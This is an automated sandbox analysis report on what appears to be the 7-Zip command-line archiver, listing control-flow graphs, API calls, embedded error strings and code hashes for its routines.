                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                • API String ID: 676172275-580504279
                                                                                                                                                                • Opcode ID: 2cc58bddada0519040ac4fc79ebe370a0d8e08b52278b0a9666f8cd599c93609
                                                                                                                                                                • Instruction ID: a5c2fa7d424537a5685e5a5209885e9a4372f4eb5c9fba24d906caf586193a70
                                                                                                                                                                • Opcode Fuzzy Hash: 2cc58bddada0519040ac4fc79ebe370a0d8e08b52278b0a9666f8cd599c93609
                                                                                                                                                                • Instruction Fuzzy Hash: 0A514C62745A81F2DB19AF25E9A43A96330FB84B50F888123DB2E47751CF3CE8A5D310

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3392 7b38e8-7b3977 call 7b1700 call 7b373c memmove 3397 7b3979-7b398d call 7b3864 free 3392->3397 3398 7b3992-7b39a5 3392->3398 3405 7b3cb6-7b3cc9 3397->3405 3400 7b39ab 3398->3400 3401 7b3a30-7b3a3d call 7b3864 3398->3401 3403 7b39ae-7b39c2 3400->3403 3411 7b3a3f-7b3a64 call 7b02a0 _CxxThrowException 3401->3411 3412 7b3a65-7b3a77 3401->3412 3406 7b3a1d-7b3a25 3403->3406 3407 7b39c4-7b39ec call 7b09e0 call 792130 3403->3407 3406->3403 3409 7b3a27-7b3a2b 3406->3409 3424 7b39fb 3407->3424 3425 7b39ee-7b39f9 call 793314 3407->3425 3409->3401 3411->3412 3415 7b3a79-7b3a7c 3412->3415 3416 7b3ae1-7b3b27 call 7c5f5c call 7b13e8 * 2 3412->3416 3420 7b3a7e-7b3aac call 793208 call 796e10 call 792130 3415->3420 3439 7b3c2a-7b3c46 free 3416->3439 3440 7b3b2d-7b3b30 3416->3440 3443 7b3aae-7b3abb call 793314 3420->3443 3444 7b3abd 3420->3444 3428 7b39fe-7b3a16 call 79b8f0 free 3424->3428 3425->3428 3428->3406 3445 7b3c48 3439->3445 3446 7b3c76-7b3c84 free 3439->3446 3442 7b3b33-7b3b56 call 792130 3440->3442 3460 7b3b68 3442->3460 3461 7b3b58-7b3b66 call 793314 3442->3461 3450 7b3ac0-7b3adf call 79b8f0 free 3443->3450 3444->3450 3451 7b3c4c-7b3c5f 3445->3451 3447 7b3c88-7b3c95 3446->3447 3452 7b3ca7-7b3caa 3447->3452 3453 7b3c97-7b3ca2 free * 2 3447->3453 3450->3416 3450->3420 3457 7b3c71-7b3c74 3451->3457 3458 7b3c61-7b3c6c free * 2 3451->3458 3452->3447 3459 7b3cac-7b3cb4 free 3452->3459 3453->3452 3457->3446 3457->3451 3458->3457 3459->3405 3464 7b3b6b-7b3ba1 call 792130 3460->3464 3461->3464 3468 7b3bb3 3464->3468 3469 7b3ba3-7b3bb1 call 793314 3464->3469 3470 7b3bb6-7b3bc6 3468->3470 3469->3470 3472 7b3bc8-7b3be2 call 794338 3470->3472 3473 7b3be4-7b3bf2 3470->3473 3472->3473 3478 7b3bfa-7b3c29 call 7b02a0 _CxxThrowException 3472->3478 3473->3442 3476 7b3bf8 3473->3476 3476->3439 3478->3439
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 007B373C: free.MSVCRT ref: 007B37FB
                                                                                                                                                                • memmove.MSVCRT ref: 007B396F
                                                                                                                                                                • free.MSVCRT ref: 007B3986
                                                                                                                                                                • free.MSVCRT ref: 007B3A11
                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 007B3A5F
                                                                                                                                                                • free.MSVCRT ref: 007B3AD3
                                                                                                                                                                  • Part of subcall function 007B3864: free.MSVCRT ref: 007B3877
                                                                                                                                                                  • Part of subcall function 007B3864: free.MSVCRT ref: 007B3892
                                                                                                                                                                  • Part of subcall function 007B3864: free.MSVCRT ref: 007B389B
                                                                                                                                                                  • Part of subcall function 007B3864: free.MSVCRT ref: 007B38C6
                                                                                                                                                                  • Part of subcall function 007B3864: free.MSVCRT ref: 007B38CE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                • API String ID: 3934437811-2067063536
                                                                                                                                                                • Opcode ID: 0e324b5fcf06ff74cfc01f68caaf0094b622985f8662e005eb2f461a138266bf
                                                                                                                                                                • Instruction ID: 4bb072728ba5855f88281e216c1c78cd20696c3a11c74d73a49c3962683118bb
                                                                                                                                                                • Opcode Fuzzy Hash: 0e324b5fcf06ff74cfc01f68caaf0094b622985f8662e005eb2f461a138266bf
                                                                                                                                                                • Instruction Fuzzy Hash: E8A17172315A84D2CE20EB16E89469EB3A1F7C5B90F504512EF8E47B69DF3CC996CB40

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 3481 7c42a2-7c42c0 3483 7c42d5-7c42d8 3481->3483 3484 7c42c2-7c42d0 3481->3484 3485 7c42da 3483->3485 3486 7c42e0-7c43ab call 7b40c4 memmove call 793404 call 7c3a20 3483->3486 3484->3483 3485->3486 3494 7c45d8-7c468f call 793404 * 3 free * 2 call 7b419c 3486->3494 3495 7c43b1-7c43b3 3486->3495 3533 7c4698-7c46a0 3494->3533 3534 7c4691-7c4697 3494->3534 3497 7c43b9-7c43d7 call 7bc684 3495->3497 3498 7c46c5-7c46f4 free * 2 call 7b419c 3495->3498 3505 7c43dd-7c43ef call 792130 3497->3505 3506 7c4728-7c4757 free * 2 call 7b419c 3497->3506 3508 7c46fd-7c4705 3498->3508 3509 7c46f6-7c46fc 3498->3509 3521 7c43f1-7c4401 call 7bcaac 3505->3521 3522 7c4403 3505->3522 3525 7c4759-7c475f 3506->3525 3526 7c4760-7c4768 3506->3526 3511 7c470e-7c4719 3508->3511 3512 7c4707-7c470d 3508->3512 3509->3508 3517 7c471b 3511->3517 3518 7c4721-7c4723 3511->3518 3512->3511 3517->3518 3524 7c47fe-7c4811 3518->3524 3532 7c4406-7c4441 call 79b8f0 free * 2 call 7b419c 3521->3532 3522->3532 3525->3526 3529 7c476a-7c4770 3526->3529 3530 7c4771-7c477c 3526->3530 3529->3530 3535 7c477e 3530->3535 3536 7c4784-7c4786 3530->3536 3551 7c444a-7c4452 3532->3551 3552 7c4443-7c4449 3532->3552 3541 7c46a9-7c46b4 3533->3541 3542 7c46a2-7c46a8 3533->3542 3534->3533 3535->3536 3536->3524 3543 7c47f2-7c47fb 3536->3543 3541->3543 3546 7c46ba-7c46c0 3541->3546 3542->3541 3543->3524 3546->3543 3553 7c445b-7c446c 3551->3553 3554 7c4454-7c445a 3551->3554 3552->3551 3555 7c3fa9-7c4033 memmove 3553->3555 3556 7c4472-7c4478 3553->3556 3554->3553 3561 7c4054-7c4072 memmove 3555->3561 3562 7c4035-7c4052 memmove 3555->3562 3556->3555 3561->3543 3563 7c4078-7c40e9 memmove call 7bc0fc call 793404 * 2 call 7c3d58 3561->3563 3562->3563 3573 7c40ee-7c40f2 3563->3573 3574 7c447d-7c4480 3573->3574 3575 7c40f8-7c410a call 792130 3573->3575 3576 7c450c-7c451b call 7b419c 3574->3576 3577 7c4486-7c450b call 793404 * 3 3574->3577 3583 7c410c-7c411c call 7bcaac 3575->3583 3584 7c411e 3575->3584 3576->3524 3577->3576 3587 7c4121-7c413a call 79b8f0 call 7b419c 3583->3587 3584->3587
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1534225298-3916222277
                                                                                                                                                                • Opcode ID: 9217f3ba69c3860f97dd2d0c7e0513805a01d2cb0f36f60198f80e75177fd356
                                                                                                                                                                • Instruction ID: 90fc39f91adfb0c46477b8bf103416b13c06c3b241a549a683bddf36323186f7
                                                                                                                                                                • Opcode Fuzzy Hash: 9217f3ba69c3860f97dd2d0c7e0513805a01d2cb0f36f60198f80e75177fd356
                                                                                                                                                                • Instruction Fuzzy Hash: 75D13C33209AC4D6CB21DB29E4A46AEBB60F7D6B44F44501ADB8E47B29DF7CC559CB00
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$memmove
                                                                                                                                                                • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                • API String ID: 2879976980-73314117
                                                                                                                                                                • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                • Instruction ID: 5bf2516e911d267475e9b5ab765cb209e4c459c9aa50498a2dfe27d9f16dd899
                                                                                                                                                                • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                • Instruction Fuzzy Hash: 9A415672615A85C6DB20DF25F88079DB3A5F789788F440126EB9E83768DF7CD949CB00
                                                                                                                                                                APIs
                                                                                                                                                                • fputs.MSVCRT ref: 007D1CF9
                                                                                                                                                                  • Part of subcall function 007DB1C8: memset.MSVCRT ref: 007DB20D
                                                                                                                                                                  • Part of subcall function 007DB1C8: fputs.MSVCRT ref: 007DB232
                                                                                                                                                                  • Part of subcall function 00792300: fputc.MSVCRT ref: 00792311
                                                                                                                                                                • fputs.MSVCRT ref: 007D1DEE
                                                                                                                                                                • fputs.MSVCRT ref: 007D1F07
                                                                                                                                                                • fputs.MSVCRT ref: 007D1F5C
                                                                                                                                                                  • Part of subcall function 007D171C: fputs.MSVCRT ref: 007D1744
                                                                                                                                                                  • Part of subcall function 007D171C: fputs.MSVCRT ref: 007D1758
                                                                                                                                                                  • Part of subcall function 007D171C: free.MSVCRT ref: 007D176B
                                                                                                                                                                  • Part of subcall function 00796618: FormatMessageW.KERNEL32 ref: 00796676
                                                                                                                                                                  • Part of subcall function 00796618: LocalFree.KERNEL32 ref: 00796698
                                                                                                                                                                  • Part of subcall function 00792320: free.MSVCRT ref: 0079237E
                                                                                                                                                                  • Part of subcall function 00792320: fputs.MSVCRT ref: 007923B8
                                                                                                                                                                  • Part of subcall function 00792320: free.MSVCRT ref: 007923C4
                                                                                                                                                                • free.MSVCRT ref: 007D1F86
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                • API String ID: 2553544393-24972044
                                                                                                                                                                • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                • Instruction ID: 46c5481bd412b7dccd234d233cbb5d1deeefd99dddd3bef9d7ae8415ab90a75e
                                                                                                                                                                • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                • Instruction Fuzzy Hash: 1BA15766745A84FACA29EF72E5943AE7331F744B80F884126DB5E07712DF6CE8A5C310
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$ExceptionThrowfputs
                                                                                                                                                                • String ID: Decoding ERROR
                                                                                                                                                                • API String ID: 117389134-2585761706
                                                                                                                                                                • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                • Instruction ID: e25f43755af2c35033ae13fe26f57c270322cc6d1542e9735b60a389a3ffe7ff
                                                                                                                                                                • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                • Instruction Fuzzy Hash: 0831DC623599C5E1CE30AB28F9847AEA371F782780F444523CA9E47769DF3CC896C701
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00796464: FreeLibrary.KERNELBASE(?,?,?,007964E7), ref: 00796475
                                                                                                                                                                  • Part of subcall function 00793404: free.MSVCRT ref: 00793431
                                                                                                                                                                  • Part of subcall function 00793404: memmove.MSVCRT ref: 0079344C
                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 007BA8CA
                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 007BA8E8
                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 007BA908
                                                                                                                                                                • free.MSVCRT ref: 007BA985
                                                                                                                                                                • free.MSVCRT ref: 007BA996
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                • API String ID: 852969883-606380122
                                                                                                                                                                • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                • Instruction ID: cdafe67cb6c9ee3d728baf64a7c09b1823f22300825e2c0a5db79eff40d32617
                                                                                                                                                                • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                • Instruction Fuzzy Hash: 1D41B426200B8497DF21EF25E85479E6360FB84B94F488525DF9E47B65EF3CE586C340
                                                                                                                                                                APIs
                                                                                                                                                                • strcmp.MSVCRT ref: 007DB723
                                                                                                                                                                • fputs.MSVCRT ref: 007DB743
                                                                                                                                                                  • Part of subcall function 007938C8: memmove.MSVCRT(0079A0E5), ref: 00793907
                                                                                                                                                                  • Part of subcall function 00793A64: memmove.MSVCRT ref: 00793AAA
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 007DB49E
                                                                                                                                                                  • Part of subcall function 00793404: free.MSVCRT ref: 00793431
                                                                                                                                                                  • Part of subcall function 00793404: memmove.MSVCRT ref: 0079344C
                                                                                                                                                                • strcmp.MSVCRT ref: 007DB4E3
                                                                                                                                                                • wcscmp.MSVCRT ref: 007DB502
                                                                                                                                                                • strcmp.MSVCRT ref: 007DB568
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                • String ID: .
                                                                                                                                                                • API String ID: 591578422-4150638102
                                                                                                                                                                • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                • Instruction ID: d204bf1a199cc9b845fb9483a3e52cdb6b2e3c9fd9bd341f5517a766a89c1444
                                                                                                                                                                • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                • Instruction Fuzzy Hash: 23A12576700A84E7CA19EF2AE68466D7371F794B84F818017DB5A47B11DF38E8B6C700
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                • Instruction ID: 525640e428eb05aefc44b4ae9321135657ebc352bd99d058d9f6ccbedb5ad150
                                                                                                                                                                • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                • Instruction Fuzzy Hash: EA312B71A18B86C6DB41AF28E89035A7771FB84764F544237E6AE477A4DB3CE844CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                • Instruction ID: f51858b76f6a4d241ef054477a18e34849cb25d1183c2be20aa4d1c41d88a543
                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                • Instruction Fuzzy Hash: 6E21F771A18B86C6EB019F28E95035A7771FB84764F504226E6AE477A4DF3CE845CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                • Instruction ID: f51858b76f6a4d241ef054477a18e34849cb25d1183c2be20aa4d1c41d88a543
                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                • Instruction Fuzzy Hash: 6E21F771A18B86C6EB019F28E95035A7771FB84764F504226E6AE477A4DF3CE845CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                • Instruction ID: f51858b76f6a4d241ef054477a18e34849cb25d1183c2be20aa4d1c41d88a543
                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                • Instruction Fuzzy Hash: 6E21F771A18B86C6EB019F28E95035A7771FB84764F504226E6AE477A4DF3CE845CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                • Instruction ID: 5c1c75e8a63609a5ab86f376f63c288d25e93fd347acd53955d7737491716515
                                                                                                                                                                • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                • Instruction Fuzzy Hash: C9114223781A48D6CA24BE26E9556692310EB57BA47184261DF2D17796DF28C8738300
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
